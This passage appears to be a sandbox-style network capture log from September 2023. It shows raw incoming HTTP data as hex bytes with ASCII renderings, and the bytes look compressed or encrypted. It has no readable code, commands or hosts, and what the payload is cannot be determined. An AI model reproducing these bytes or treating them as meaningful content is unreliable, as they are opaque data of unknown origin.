                                                                                                                      2023-09-07 16:19:24 UTC1890INData Raw: c0 03 ab e5 8d f0 ad 5f cb e7 c0 06 c5 80 0a 02 78 a0 a5 d2 5a 19 ae 1c 50 4e 01 01 1a a8 aa fa 32 1c d2 41 30 6c 43 6d 14 f5 69 3d a0 dd a7 93 3a 65 f4 5a fa 8b fa 34 fd 53 e0 7a 2d a3 9b 31 d3 d8 6b 3c 32 38 b3 b7 f9 81 79 0c 18 ce 41 77 7e 64 ed a2 b9 2f b3 ed 45 f6 4a 3b 19 3e 27 d5 de 62 ef a0 ba 9e 1f 9d 2d 90 98 17 68 e2 6a 1c dd fc de cb 9c 80 36 af cb 86 b3 23 d8 b1 ec 67 6c 3a cd 21 3f c7 fe c2 de 67 8b 71 be 5c 15 ae 06 d7 00 1a ac 17 b7 06 2b 79 82 fb 89 bb cb 49 bc cd bf 02 56 7c 87 5f 03 94 cd e4 7f e0 af f2 d9 70 3e a5 85 4a 84 23 8a d0 4e 98 02 e7 b3 53 d8 03 f4 3d 0d f4 2d 26 96 17 1b 50 dc 4c 85 16 5d 2f 6e 15 bf a0 1a 69 bc 74 0c ab 57 1c 5c 59 15 a8 f2 1a 94 e8 97 f2 49 f9 2c 5c a5 9f 52 19 6e 3e 94 f4 7c 14 34 db 6a ac cf cf 8a 4b 95
                                                                                                                      Data Ascii: _xZPN2A0lCmi=:eZ4Sz-1k<28yAw~d/EJ;>'b-hj6#gl:!?gq\+yIV|_p>J#NS=-&PL]/nitW\YI,\Rn>|4jK
                                                                                                                      2023-09-07 16:19:24 UTC1898INData Raw: 2e 67 7f 60 03 b9 11 dc 61 ae 0e df 99 3f c0 fb 08 4d 84 45 82 17 45 c3 16 f1 8a d8 0b de e6 73 7c e7 ba 4a 3f 65 8f f2 50 69 00 47 7a 42 cd af 71 da 30 6d a9 76 42 bb 09 ac ef a8 cf c4 77 be 82 98 ec 65 cc 36 b6 81 93 82 cc 8e e6 44 73 9b 79 c5 ac 69 f5 c7 3b 38 60 e5 b7 a3 f1 09 0e b8 fb 2a 45 f8 53 9f ad ba e0 d2 6c c4 46 0c d4 c3 0f ec 37 dc 76 be a0 50 57 e8 21 cc 14 b6 41 fd d6 16 db 89 d3 c5 74 f1 96 58 5d 6a 2b 25 4a 3f 20 1e 5e 90 07 ca 33 e5 6d f2 79 f9 45 65 94 b2 1a f9 a1 a9 3d d4 89 b4 12 41 c0 de b1 f8 4c bb b5 bb 5a 38 d8 e7 94 5e 13 39 32 c7 38 60 dc 34 2a 9a 5d a1 cb 3f 37 ef 83 8d a2 ac e9 f8 3c c1 58 91 e9 f6 36 fb 0a e9 0d 7f 57 b4 cb b9 13 da 04 58 32 13 91 71 8c a9 02 47 dc 9e db 87 77 d1 5a 98 0b fc 5a 2c f9 ca 43 a1 43 bd 94 ba 4a
                                                                                                                      Data Ascii: .g`a?MEEs|J?ePiGzBq0mvBwe6Dsyi;8`*ESlF7vPW!AtX]j+%J? ^3myEe=ALZ8^928`4*]?7<X6WX2qGwZZ,CCJ
                                                                                                                      2023-09-07 16:19:24 UTC1906INData Raw: 73 56 23 de 4e 22 0d f6 bc 33 19 b7 6c 57 62 80 2b c8 e3 53 82 69 57 eb f9 fb 59 63 98 d9 54 e5 cd 9d 43 ee fd 29 5f 36 98 ce 5e e4 9c ba 88 64 47 d0 19 8b c5 54 9b 48 a3 6a 97 9b 91 6e b1 3e ee 9b 92 a4 cb 42 b8 8e 94 3d ee ba 55 3c 97 44 3b 55 4e ee 1c e7 ae 91 53 71 ce 91 05 3c e5 54 a2 73 29 32 c7 a9 6c f1 64 8e 93 33 b9 b3 c5 d9 b5 fa 3f f1 ec 0e 13 2d f6 78 76 f7 8e 52 96 c7 b3 3f ab ca 46 48 09 c4 2d ee 9c 48 97 32 69 d7 c2 25 ff 2b aa cc bd 9b f0 40 f6 a3 bd 03 67 a7 29 54 e9 42 35 af 9c aa f5 6c 25 99 6a d4 39 d5 e9 8b 1e df 9e 53 85 16 3c be 3d 67 27 68 b2 c7 b7 e7 d4 95 8f ab d7 dc f7 ce 3d f5 e3 20 cd 20 df fe 74 9d 78 bc c7 af 3c d1 69 99 da 45 f8 95 dc 5d be 04 30 48 17 3d f2 99 1a 6f 82 be 92 2a ba 4e 2d f7 69 16 71 57 9c 0c a3 2d 65 47 ee
                                                                                                                      Data Ascii: sV#N"3lWb+SiWYcTC)_6^dGTHjn>B=U<D;UNSq<Ts)2ld3?-xvR?FH-H2i%+@g)TB5l%j9S<=g'h= tx<iE]0H=o*N-iqW-eG
                                                                                                                      2023-09-07 16:19:24 UTC1914INData Raw: 6e fd 7a e2 98 6f e7 1e 6f 7e b9 ff fd a4 62 3f 74 9a 1d 58 7b 6e f9 e5 bb 36 4e 68 3a 61 cd b1 94 63 5d cf a5 f1 1f 5e d9 f9 99 7e f8 6c 81 56 e2 c2 b7 8f 0d 7c 63 dd 9a 7c cb bb a5 ff 78 f1 e5 98 51 fd f6 ed 5c 58 66 74 f8 2f ef 95 da 37 2f e9 ab 8a 45 5b 1f 78 61 e5 7b 3d ac 0d 3d e3 3b 4d 78 ef c7 8e 0d 3f 1f f1 da 96 6f 99 89 05 21 f3 bc 1a 7b f0 cd 1c 71 f2 b7 61 cd 23 37 74 1f 7b 2b bb ca 81 29 75 9f c5 b7 09 07 9e 06 b8 1c 3c 28 53 a2 7d af c1 7d 1d 1c aa 1f d8 fc f5 9e 0d 73 41 5b ce 6f 3c 03 6d 1a a3 b8 ff 00 1b dc b3 4e 20 e0 4a 0a 7c fa 47 04 36 08 7c 71 d0 e0 c0 ee 43 63 a3 07 0d ee 3b aa 57 54 20 c8 2a 70 d0 eb 03 46 b2 2f 30 4d dd b0 68 e4 fc 27 8f 61 31 62 68 8f 01 7d 7b 06 46 0c ee 3b b0 fb e0 91 81 4d 41 6f 7d 7b f7 ed 49 78 1b d8 d8 fd
                                                                                                                      Data Ascii: nzoo~b?tX{n6Nh:ac]^~lV|c|xQ\Xft/7/E[xa{==;Mx?o!{qa#7t{+)u<(S}}sA[o<mN J|G6|qCc;WT *pF/0Mh'a1bh}{F;MAo}{Ix
                                                                                                                      2023-09-07 16:19:24 UTC1922INData Raw: 2c 68 2f 86 2a db 1f a3 36 89 6e 02 02 75 64 07 38 12 3b a7 b0 63 a4 d7 c7 9c 15 43 d5 9e 97 89 0a c9 62 6d c6 d5 ca 7b cc a0 99 42 55 d5 e8 0a 43 33 33 68 a8 58 fc e2 53 59 99 18 5a 12 94 17 94 be 47 f6 43 24 6a c7 48 27 58 cc e5 65 cb da b7 41 a9 3b ae b3 59 87 5e 6f b3 4e 83 bf 22 f8 7b 0c fe 3e 85 bf 4d f0 97 33 d9 66 7d 71 32 7b e6 6f b0 59 bf 0e 7f c5 f2 5f 03 bc db 79 3d fb 6e b8 be 9f bf 24 dc 69 2e f6 9f 02 d6 d8 8f 91 d2 05 d0 c7 bb 90 4d f6 5b 15 bf 36 b5 7e b7 a2 1f 7c eb 36 fc 78 0e 3f 5e c0 0f 5c d4 87 7b a5 d0 90 98 f3 dc 74 9b 8d 32 4b 36 7b 9d e7 b6 5c a5 d8 bc 0c 0d 85 16 6d 77 d3 a1 4c dd 54 13 a8 9b aa a4 27 d2 26 5b c2 3e 51 42 74 c5 a4 62 2a ee 51 05 73 22 c7 42 2e 7b a3 db ed 0e 98 5f 41 45 cb f6 30 18 eb fd db 91 cc 0d 33 a9 d3 b0
                                                                                                                      Data Ascii: ,h/*6nud8;cCbm{BUC33hXSYZGC$jH'XeA;Y^oN"{>M3f}q2{oY_y=n$i.M[6~|6x?^\{t2K6{\mwLT'&[>QBtb*Qs"B.{_AE03
                                                                                                                      2023-09-07 16:19:24 UTC1929INData Raw: 4e 56 57 62 64 68 f6 b2 5c a4 b8 c4 cd 88 de ed 29 2a 96 e3 9a 14 f6 d1 20 c4 ab 6f 8a fb 0c d1 ad 59 00 65 9b ad ea f9 f4 86 9d d7 82 c6 fd d6 74 bd 86 66 9e 6d 9b 0b 91 fc e3 92 24 fc 6a 31 7c b2 c0 e6 81 fb 8a 85 c8 02 48 92 ec b9 6c 1f bb 8b 74 63 ed 3d b1 48 c1 71 16 9b 0f 64 3a 23 70 53 31 b9 94 2f 43 88 85 99 62 53 f8 84 55 88 cc 01 10 4b 04 2d da ee 26 1d f3 bb 86 f3 cc af e2 02 7b ad 64 bb 1b 77 ac 68 d2 20 44 b0 4e 4b f4 68 1a 8c b2 99 53 3f 40 41 9b 8e 9f 13 6e c1 b3 d3 14 34 87 c2 e4 3d 33 1b 86 6b f8 2f 69 18 2d 02 ff 8b 46 4f 1d 47 1f c8 db d1 cd f8 50 24 1d 89 46 f0 c1 2d bd 25 23 5f f3 86 6a b5 dc 3b 8d 71 47 32 99 69 2f 3c 8b 9c 9b 80 fc 75 47 a3 e8 9a f6 bf 78 06 1d 3b 6f d1 33 af c1 29 d1 08 be 84 25 05 dd 7f 54 d7 15 be e8 26 13 85 7e
                                                                                                                      Data Ascii: NVWbdh\)* oYetfm$j1|Hltc=Hqd:#pS1/CbSUK-&{dwh DNKhS?@An4=3k/i-FOGP$F-%#_j;qG2i/<uGx;o3)%T&~
                                                                                                                      2023-09-07 16:19:24 UTC1937INData Raw: 49 18 44 9d 16 5e 6c 02 d8 11 82 55 79 ab dc cf 10 ac e2 48 61 44 52 e1 2b e0 47 32 7e 85 5e 5e a5 57 5b 22 39 ad b6 3f 3d 75 fb 95 fb 2e 2d 49 f8 33 4b 5b 34 69 5b 69 cb 15 f1 3f 99 3e 99 7f 05 7c d5 e3 36 2e 64 de 28 36 c9 cf c1 2f 4b 5b 12 f8 cb b2 61 fe 6f 62 cf c1 6e 86 a0 44 be 7f 23 c8 97 1f 93 d3 c9 f7 67 fb f3 43 b4 56 3d 01 b8 f3 c5 3b 59 25 63 c5 11 f4 85 85 9e 7f 12 77 b3 64 b0 5b e0 5b c4 22 23 cd 1a 29 f2 8e 3b f9 d0 30 c1 2a bf 09 7e 2e 58 07 6b 7f 69 cb 15 df ff 2f 29 29 b1 e1 7e da 22 e6 e2 30 53 2b 33 e5 fd 7f 3e d5 fd ff a1 97 39 cf 36 78 fd ae f5 bd 7f fc e3 1f 87 ae 1a 25 d7 8f 14 d4 5e 1c 88 82 e5 a9 28 28 d0 52 80 fc 9f a8 e1 bf dc 7f 69 e2 22 1e 59 ca 98 3d 5a e1 fe 74 f1 a0 fc 18 fc 12 78 2a 7a 18 c7 47 00 c7 87 26 32 fc b4 2c 12
                                                                                                                      Data Ascii: ID^lUyHaDR+G2~^^W["9?=u.-I3K[4i[i?>|6.d(6/K[aobnD#gCV=;Y%cwd[["#);0*~.Xki/))~"0S+3>96x%^((Ri"Y=Ztx*zG&2,
                                                                                                                      2023-09-07 16:19:24 UTC1945INData Raw: e2 b0 4a 12 8c a4 83 8c f4 eb 6a eb 02 7d e8 70 a9 36 f4 18 8e 03 00 ec e4 e7 39 6a b7 3c 8e 03 b0 fb 8d e8 72 21 91 40 8a b5 c2 24 dc c2 56 3b a9 83 ba 78 27 3b 08 50 01 d4 e3 6b 85 15 f0 bf 4b 01 bc 0c ba d6 03 29 f2 66 ba f4 67 5b b7 00 64 dc d3 3e 05 fd 83 c6 f7 1f e1 c1 91 63 b4 0d 9b a6 b8 1c 40 4e 06 15 3d 57 73 0b 65 2c e4 8f c0 e9 6d 44 3c 30 27 9a 09 56 51 67 2a c1 14 32 8c 2e 24 8e a5 03 1b 72 41 01 87 a4 66 09 97 1f 2f 22 c4 f2 6d a0 fb 22 c1 be 80 c8 10 0e 5e be 26 c0 dc 39 86 0d 5a e3 85 ea da 61 ed 04 71 05 7d 87 ab 79 8e b6 d5 93 d2 7d 78 bc 59 2f 14 b1 c9 25 a9 7e b3 3a 9e 94 60 8a d2 fa 94 8b 08 18 e5 ad 57 b1 bb 6a 11 82 95 0b 19 30 6d df a3 70 59 11 2a ae 66 09 fd 6d c8 99 c9 71 3f 39 46 3b ec 2f f0 35 5c 02 9e 58 3e d1 85 1b 49 0c 2d
                                                                                                                      Data Ascii: Jj}p69j<r!@$V;x';PkK)fg[d>c@N=Wse,mD<0'VQg*2.$rAf/"m"^&9Zaq}y}xY/%~:`Wj0mpY*fmq?9F;/5\X>I-
                                                                                                                      2023-09-07 16:19:24 UTC1953INData Raw: d8 65 c8 c3 d5 6f 81 3f e4 d3 a6 8f cd e2 96 4d 17 41 63 6e 23 94 cd e1 6a ea f4 aa b7 1d a9 0e 35 54 7c 47 15 f5 f6 be 05 55 56 74 f2 e9 3d 0a 13 75 77 33 69 b0 13 e5 eb f0 d2 4f 7b a1 e0 07 20 15 66 9f c8 69 d2 0a 9a 0c d8 c1 dc e3 fd fd fd 5d b8 81 0e c7 0b fb 60 b3 58 0f 05 e6 59 1a f3 42 9f d1 8c 81 51 24 04 13 20 e2 1b 1e b3 de e0 81 1e fa 1b e2 ca e1 b8 a8 f7 e6 5e 31 04 c9 9d 30 45 69 61 1c 09 1d 32 84 62 68 07 56 b0 13 9f bb f0 b9 1b 9f 7b f0 d9 80 cf fd f8 6c c4 e7 61 7c b6 c2 00 e1 5c f1 61 ac 02 76 85 2a b9 d8 5b 77 12 47 b1 95 db 1b 3a 01 30 38 79 06 27 b7 f7 28 b7 b7 0d dc 86 b7 fa f6 2b 71 c2 8a 6c a9 a8 55 62 90 48 00 83 b6 df a4 3a dc 27 7a b1 0e 61 da b2 07 a7 1f 36 5d 54 a2 f2 c1 77 d8 b6 63 88 3b 29 60 bc d4 04 77 66 c2 5b aa 44 03 d4
                                                                                                                      Data Ascii: eo?MAcn#j5T|GUVt=uw3iO{ fi]`XYBQ$ ^10Eia2bhV{la|\av*[wG:08y'(+qlUbH:'za6]Twc;)`wf[D
                                                                                                                      2023-09-07 16:19:24 UTC1961INData Raw: 84 0a 56 ea 20 2f 3a cc 15 e6 61 30 cd 65 7d ea b9 82 51 31 29 29 81 dc fe 1a c1 50 80 0a d3 81 6c 16 23 b2 e1 d5 1f 4c fe 6b 4c 36 91 2a 4a 00 b7 4b c1 28 a5 4a 1d c0 43 a7 b2 1c 7a 11 82 2f 4b 96 aa 06 f7 3f 98 cc 86 87 6d 61 58 48 0f 4e 4e d4 df a4 c4 32 04 cd 1b be ad ed 30 04 86 a1 3b 0b 18 2c 5f db 7e ba 7c ff cc bc d3 6d 87 4f 62 a9 c9 da 5c 89 61 67 2a ef 84 dd fd 42 3b 68 15 dc 25 70 b3 82 87 16 58 5b cb 2f d2 0e 81 3b ab 1f 1c 59 40 44 e3 01 ba 72 9b 6e 6c b9 74 bc 6c 44 13 fa d6 32 2d d1 e2 91 19 12 e2 91 79 18 ef 87 ad f2 16 45 ce eb 53 0f ce 4a 1b c4 5d a8 fc 26 b4 25 d5 19 40 93 45 a1 cd 8d d7 9a 2b a3 1d 62 9d 5c 7b 0b eb 12 0b bc a8 26 3e 7a 4b 5c cf 2d ff 5c 2a 2f bb 65 e0 0e 22 4d 96 23 94 ee 14 8d 62 21 1a 35 b9 7d 47 e9 2c 92 4f d9 8a
                                                                                                                      Data Ascii: V /:a0e}Q1))Pl#LkL6*JK(JCz/K?maXHNN20;,_~|mOb\ag*B;h%pX[/;Y@DrnltlD2-yESJ]&%@E+b\{&>zK\-\*/e"M#b!5}G,O
                                                                                                                      2023-09-07 16:19:24 UTC1969INData Raw: 5b a6 d6 25 0c df 07 6e 77 bd 62 f1 b2 a5 6c e9 68 eb 59 de 74 15 8d e9 d6 19 ab de 59 53 75 d9 20 4c 0a ae 5e 91 24 5c db 52 f0 a0 12 2e 58 81 e3 87 60 38 59 68 ae d2 0b 67 ae 82 0d 32 2f ff 48 af 7d 82 33 53 fb ba ef 6a dc 0e c7 f5 29 df 7d 15 e3 43 5a 1a 83 f7 25 51 56 05 43 c6 df 26 15 1b 1d 2a 1a b3 53 24 6e 00 04 f5 78 14 69 e4 c0 9a fb 0b 73 82 24 7b a1 3c 6e 42 a4 ff a7 ba 3d be 86 0f 35 67 88 fe 3b 24 5b 1b 80 53 d0 85 37 3d 94 11 68 db 97 49 a1 7e 01 24 cb 7e 23 ef 15 8b da 30 b4 f8 6b 40 ca b1 39 3c 9c 6d e9 01 7a c2 1b cc 6f 47 84 97 e6 5f ae 9c b1 07 fb ee 2a ef e2 ea d3 21 cd e1 9b 0a 30 7c b8 ab 4f e1 ea 53 20 05 45 0b 03 ec 5d e8 d0 49 85 4a f0 32 f7 38 4f d2 61 d4 e9 c9 33 c2 c1 6e 3a e0 40 6e 3a 37 cc 2d ed ce e9 06 29 ff 47 7d 8a ba 98
                                                                                                                      Data Ascii: [%nwblhYtYSu L^$\R.X`8Yhg2/H}3Sj)}CZ%QVC&*S$nxis${<nB=5g;$[S7=hI~$~#0k@9<mzoG_*!0|OS E]IJ28Oa3n:@n:7-)G}
                                                                                                                      2023-09-07 16:19:24 UTC1976INData Raw: ba c0 98 17 72 68 52 ee 19 7d 49 af 1d 3a 55 0e d2 09 d7 14 92 f1 f7 50 c6 01 84 7c fe dc a0 92 13 18 1e fd 4a 4f f7 bc a2 de f2 83 64 89 21 f8 e4 60 c3 f8 ad 9f b1 61 9c 9f e5 d2 86 51 35 27 6b 1e b2 cc ed fd cb 90 16 20 f7 c3 51 47 70 03 e8 45 70 1e 67 cf 0a ce 00 8d ed 40 92 68 f4 06 57 a7 ea c4 42 73 20 59 5c b8 6c 48 da e2 e5 0d fd 68 0b 8d 4a 56 ef db 9e c3 d0 9e c1 2b 4a 60 98 85 45 11 65 41 ef 93 44 7a d4 4d c2 1b 86 43 c9 b3 8c 83 c6 17 0d 76 4d 41 16 4d ac 38 c5 0e 47 ae fe f1 1c 30 f5 6c 55 2c 27 50 25 46 a6 e4 a4 d1 d2 21 96 74 89 25 17 c5 92 f3 40 4e da da ad 87 b8 a7 c1 d1 1a 59 08 0d 90 79 10 eb 51 2c 3a 4b f1 e6 09 52 74 8e fb eb b1 e4 a2 b3 5c fd 13 06 af f5 8a 50 40 17 4d aa 37 78 45 5f 7e 77 43 15 9a aa b7 55 4c f1 06 9f 30 e9 02 a3 82
                                                                                                                      Data Ascii: rhR}I:UP|JOd!`aQ5'k QGpEpg@hWBs Y\lHhJV+J`EeADzMCvMAM8G0lU,'P%F!t%@NYyQ,:KRt\P@M7xE_~wCUL0
                                                                                                                      2023-09-07 16:19:24 UTC1984INData Raw: cd 90 5a af 15 be 6e c0 af eb 6a f2 ad b5 5e 1b 7c 5e 89 9f 97 d6 e4 db 6a bd 76 f8 4c c5 cf d1 35 f9 76 ad d1 81 ae ed ea 61 dd 71 ad de 16 1e 38 3d 2c 69 f5 e8 d7 ae de 8e 0b 49 a3 d5 22 14 61 59 88 c6 ba 3a 84 a0 71 87 10 90 72 e8 0a 6c 0b f5 59 7f 2a 84 be cd a6 eb 94 2c 5b 00 c2 bd 72 a6 bc ce 8a fa b1 d4 78 8b 02 40 40 ec d9 26 06 9c c0 2b 6f ad ea 3b d4 17 22 94 08 59 df c4 fd 40 a9 fc aa 37 be d4 be 01 0b 28 d5 1f 41 c5 8b ee ac 64 91 a0 31 6b a4 a5 f3 21 bc 23 21 29 53 44 d1 da 1b a8 87 6e 51 af 2e b3 04 9a 05 52 ec df 1d 95 0f 24 1b 0f a1 bd 28 26 9e 34 1e 7a d5 f3 d8 07 1a 05 79 c7 cf 13 d9 18 92 77 37 25 9a 52 14 fd 1d 09 63 aa 47 e3 c2 db 19 2a 7f ca dc 9f 06 31 58 8b 24 ad 8e db 86 07 87 ee 8e f2 6b 45 9b e4 2d d5 f1 3d 4a 2c 7e e3 7d a8 3a
                                                                                                                      Data Ascii: Znj^|^jvL5vaq8=,iI"aY:qrlY*,[rx@@&+o;"Y@7(Ad1k!#!)SDnQ.R$(&4zyw7%RcG*1X$kE-=J,~}:
                                                                                                                      2023-09-07 16:19:24 UTC1992INData Raw: 8e 52 23 1b 79 b8 98 bb 1a 4f 07 4e 60 c3 e3 cc 82 11 42 2f 46 77 a3 3e 86 da 65 cc 99 c9 4a 66 ba 8f 95 a7 e0 fa fa 5e fa 5e fb ee 90 e3 2f f6 dd f9 21 af a3 c0 cb ab 0a 85 2b 8d c3 ca 58 c2 99 91 6c 1f 1f f4 0e 9d 6c 0c f6 06 ba 90 3d bd 86 aa 94 ce 3b af 66 5f 76 d6 bc 62 0d 26 2a f7 f1 ef 12 75 6e 95 87 ce ad 42 1e 3c cc dd cb 2b 9f 47 73 6e 41 43 18 e1 44 29 1f b4 e0 f0 27 b0 cc cd 9e c4 b2 27 41 62 77 73 f9 28 e6 9b 90 5e 6f af b3 d7 85 92 6a bd a1 9b 1d de 02 de 54 40 2d 2f 64 25 e7 39 6c da 72 69 bf c3 a6 ca 8a 2c cb 7c 25 d5 18 f6 14 7c b8 e3 1c bb 47 b9 d4 0b 02 11 c4 c7 5b e3 e9 e4 45 af 98 12 1e 11 38 84 21 93 20 84 8d 60 36 ba 25 cf f6 19 fb 9b e2 da 9b 85 61 00 34 25 a0 26 36 c5 d5 c0 d8 23 1d 8d 5e b9 27 22 7f 1e ff 6f 97 f6 9b ef fd fd a5
                                                                                                                      Data Ascii: R#yON`B/Fw>eJf^^/!+Xll=;f_vb&*unB<+GsnACD)''Abws(^ojT@-/d%9lri,|%|G[E8! `6%a4%&6#^'"o
                                                                                                                      2023-09-07 16:19:24 UTC2000INData Raw: 75 43 fe 6d 02 6d 2c 5b 29 15 f2 5f 9c 89 8e 9e 8d dd e0 33 29 6c 11 b4 c9 5f 50 c8 ff 81 56 c0 0f f9 43 33 12 7d 5e 9e 4b f5 27 d3 5d cb 73 e3 6b a9 36 09 a1 36 d4 1a ad f0 aa 1b 50 7f a0 dd 84 9a 13 18 9a 32 0b 17 d6 c7 9d c5 0d 67 d3 8b 2c 07 40 c7 bc 1f 2d 6f cd 03 5a 59 75 d2 90 2d 96 35 d7 29 39 da c9 dc 95 33 e5 2d 3a 7f 6c 84 cb 48 0b ed 87 1f 32 83 53 dc b0 cd 21 7e ac e2 47 a2 9f aa 93 16 17 3a 3b 81 df 54 54 fc 82 5f 80 88 6a cb 00 f4 64 c6 bb 90 fb 71 f8 7b 1a fe fe 08 7f 2f c2 df 1e f8 03 5e db 46 fe 4b c5 89 57 9c c3 61 b5 d9 ed 36 1b 7d 61 00 fc b3 c4 9d ff 9f 25 fa cf ec 57 1f 7c 96 84 bd 25 6c 0f e0 73 b6 84 6a 87 31 50 cd 44 50 a9 61 01 2a df 60 79 6b f6 05 6c 76 a2 5e 14 09 91 89 91 98 2c e4 08 8e 7d b1 d3 ab cf 90 04 62 b1 db 24 16 91
                                                                                                                      Data Ascii: uCmm,[)_3)l_PVC3}^K']sk66P2g,@-oZYu-5)93-:lH2S!~G:;TT_jdq{/^FKWa6}a%W|%lsj1PDPa*`yklv^,}b$
                                                                                                                      2023-09-07 16:19:24 UTC2008INData Raw: be 9b cc e8 b6 e3 c5 85 e6 b6 23 5c dc 4b 41 16 d6 ca 6c e7 46 4d 75 f1 94 58 e1 58 ee dd 5a cb 51 ad dc 65 d5 b3 9d ea 60 18 61 40 34 ab c7 a9 dd e5 b2 cc f3 f1 fb ef c0 7b b6 ce 79 d5 75 f7 4b 5a 4b 17 a4 09 0f df 68 55 2e d8 28 29 83 5f c6 6e aa 09 4d d9 c9 08 02 81 73 3e de 31 8f 66 f0 2b 1a f9 2b dd e5 44 8b dd 1b ea 43 d3 0d b1 d1 1e 87 dd dd 5e dc af bb b5 a3 62 dd b5 99 dd bd 09 76 b7 40 d3 12 f1 96 7f 9c d6 6d 53 3f a1 fe 2f 88 6e b1 a3 0a 95 62 17 75 0e 28 fc b6 d8 84 c2 3f 17 c4 a0 40 62 79 1f ea e5 99 d9 3f d6 10 cd 89 7c aa c9 99 9e 2e 65 28 ef 1e 49 f6 2f 13 f9 7f 46 a2 ec a6 4b c7 1b c3 3d 7a 7a 6c e2 6a 60 0d fc c6 c4 59 17 8f 76 19 1f 1a 13 73 e1 17 4d da 75 a1 c5 38 d8 66 3e 58 85 0d e8 4e 3f 1d ca 41 9b 22 cb d4 42 fe 23 40 34 76 08 be
                                                                                                                      Data Ascii: #\KAlFMuXXZQe`a@4{yuKZKhU.()_nMs>1f++DC^bv@mS?/nbu(?@by?|.e(I/FK=zzlj`YvsMu8f>XN?A"B#@4v
                                                                                                                      2023-09-07 16:19:24 UTC2015INData Raw: 07 f3 44 6a 2d 78 9b cf 63 b4 a1 41 39 9a 15 78 fb b0 12 a6 c6 e5 30 35 6e c7 a9 31 28 b3 b8 63 e5 c8 65 f1 5a 79 bb 65 e5 10 98 1e d3 32 d5 8e 65 99 2b 31 c0 58 71 1d 9f f2 af 3e d3 24 51 cb 6b 37 b4 bc 0e 23 3c 9c a6 c4 00 ed ae 76 00 53 47 38 01 23 74 15 6a 75 95 e0 7d e0 38 06 ad 94 28 cd 50 54 2e ce eb 38 71 48 3b 60 39 f1 31 36 2e af a3 b2 7c bf 25 86 51 18 5f d4 31 ff ff 32 5b a6 fe d0 6c 49 fd 1f 66 cb f1 ae 1f 98 2d 1f 45 23 4b e5 a3 75 f9 85 ac 5e 6b 91 01 34 6b d8 4e ed cb 35 f5 3c 41 b9 d1 34 5f 5b 2a af b1 c2 df 74 17 3e 52 f1 31 1e 1f 59 f8 f0 e2 63 11 3e 96 86 74 94 5a e5 aa fb 83 07 95 1b d9 ce 7a ee 50 e4 b0 3d 74 0b e5 0f dd e2 ca 55 3b b5 2f 65 25 85 ed cc 38 5c ff 8d 4d 91 f4 91 a1 5b 1c b7 aa 11 ad c5 ae c4 d7 8c 9c 9e ab 9e 9a 3f b7
                                                                                                                      Data Ascii: Dj-xcA9x05n1(ceZye2e+1Xq>$Qk7#<vSG8#tju}8(PT.8qH;`916.|%Q_12[lIf-E#Ku^k4kN5<A4_[*t>R1Yc>tZzP=tU;/e%8\M[?
                                                                                                                      2023-09-07 16:19:24 UTC2023INData Raw: d9 34 b1 a3 59 05 cf 24 26 38 85 a9 43 a1 02 de fc 53 34 f2 4d 99 52 36 85 47 c7 12 22 1f 27 b2 4e d9 84 fb 87 12 a7 fb b4 32 bc ea 6e 62 f8 f4 12 87 5e 22 e9 63 f5 92 14 6d 8e 2b b6 29 1b 88 c8 db c4 5f ed c4 43 2a 02 cb 23 53 84 92 5a af 7f 68 d9 45 78 bd 48 42 ff 15 45 05 de fc fc c0 23 93 63 3c 9c d0 16 db a5 cf 4c 93 16 eb 97 9a 5c dd 78 36 57 82 d4 57 65 8c 64 40 4f ba bb 15 37 94 31 41 3b d5 ad 38 dc df af b8 26 34 61 45 68 c1 5f 5d 6c a0 9e eb d4 1e 70 58 d4 3d 64 2d 9b cd 90 78 41 87 c5 f2 86 d5 22 3e 16 c3 47 78 d3 e2 87 49 0d 48 db 95 0c 03 da 40 fa 42 d3 1d a8 5b b7 8d b4 df 32 d0 7b 27 30 18 19 cd 7c d1 5d 06 10 a1 40 b2 b1 d4 69 2c 75 19 4b 93 f8 34 d3 46 12 a5 81 6e e8 b6 6d a8 59 d4 50 84 2a 78 ec 0a e3 67 29 c6 cf 92 8d 9f 8d e3 c3 cc 84
                                                                                                                      Data Ascii: 4Y$&8CS4MR6G"'N2nb^"cm+)_C*#SZhExHBE#c<L\x6WWed@O71A;8&4aEh_]lpX=d-xA">GxIH@B[2{'0|]@i,uK4FnmYP*xg)
                                                                                                                      2023-09-07 16:19:24 UTC2031INData Raw: 94 5f 8c 33 e3 29 37 e9 4b 8f 75 49 19 5b 1a e0 cb ca f2 bc 59 78 c1 87 26 1e e2 18 4a d4 ac 52 f6 08 14 a8 9e 3f af dc bf d2 2c 4e f3 98 4b d8 84 40 68 b1 70 41 69 89 9b 25 ff d9 b0 b4 96 00 e9 96 73 d5 f3 4d 52 8b 46 08 58 09 18 0e de 19 f8 68 f2 5e 66 6a 8e 5d 0c 64 9a 69 e1 be 7c 15 b4 4f 9b 8b 15 b2 d9 94 0b 1f c9 65 ea 30 8c a7 81 67 43 ab bf 2e db d3 78 f9 88 61 4d 83 a4 96 64 d5 97 ca f1 ca 59 65 85 bd 19 bf 00 82 65 60 13 13 d0 8d 72 d9 ac f2 68 d9 d5 57 3d 7f 1a 2a aa 1c 57 df bf a6 81 20 17 e0 b9 94 5c 2d de 77 4c b4 d5 c5 d5 c6 2c 94 57 d8 eb 26 0b bb 1b dd 05 ec 69 13 0f 12 37 5a 8b a7 60 9c 89 4a 91 bd 2e 4e 73 d9 6b cd 05 50 01 54 57 73 52 bc 06 67 2f e9 f9 ea 0b 69 78 f1 75 82 f4 07 c0 64 6d 5a a8 51 20 41 68 b5 50 13 00 32 ea e2 72 d3 44
                                                                                                                      Data Ascii: _3)7KuI[Yx&JR?,NK@hpAi%sMRFXh^fj]di|Oe0gC.xaMdYee`rhW=*W \-wL,W&i7Z`J.NskPTWsRg/ixudmZQ AhP2rD
                                                                                                                      2023-09-07 16:19:24 UTC2039INData Raw: 26 57 7f c3 28 00 8f 8a 02 7e 93 83 47 03 78 f4 30 74 fc 05 17 24 36 a4 38 ef 4e 21 7e a4 40 d6 94 28 98 bc 1c d3 18 00 8f 89 02 5e c7 c1 63 01 3c 36 0a d8 c5 c1 97 00 f8 92 61 e8 98 46 74 a4 3a ef 4e 25 3a 52 21 6b 6a 14 4c 17 68 49 61 c3 38 00 47 1b 4e a7 38 78 3c 80 c7 47 01 ef e3 e0 09 00 9e 30 0c 1d b8 66 a1 6c 98 e8 bc 7b a2 e8 81 ac 13 21 eb c4 21 59 7d dd 12 e8 d5 0d 93 00 34 e9 bb a0 db 00 34 19 40 93 bf 0b ca 07 d0 14 00 4d 89 5a b7 34 cd 72 c0 72 30 e3 bc f3 bc e0 6d c2 f5 c5 66 cb db b4 be f8 0c 5f 5f ec 39 00 da a8 29 f0 28 0e 24 77 87 b3 b8 03 d7 4c 60 42 2b 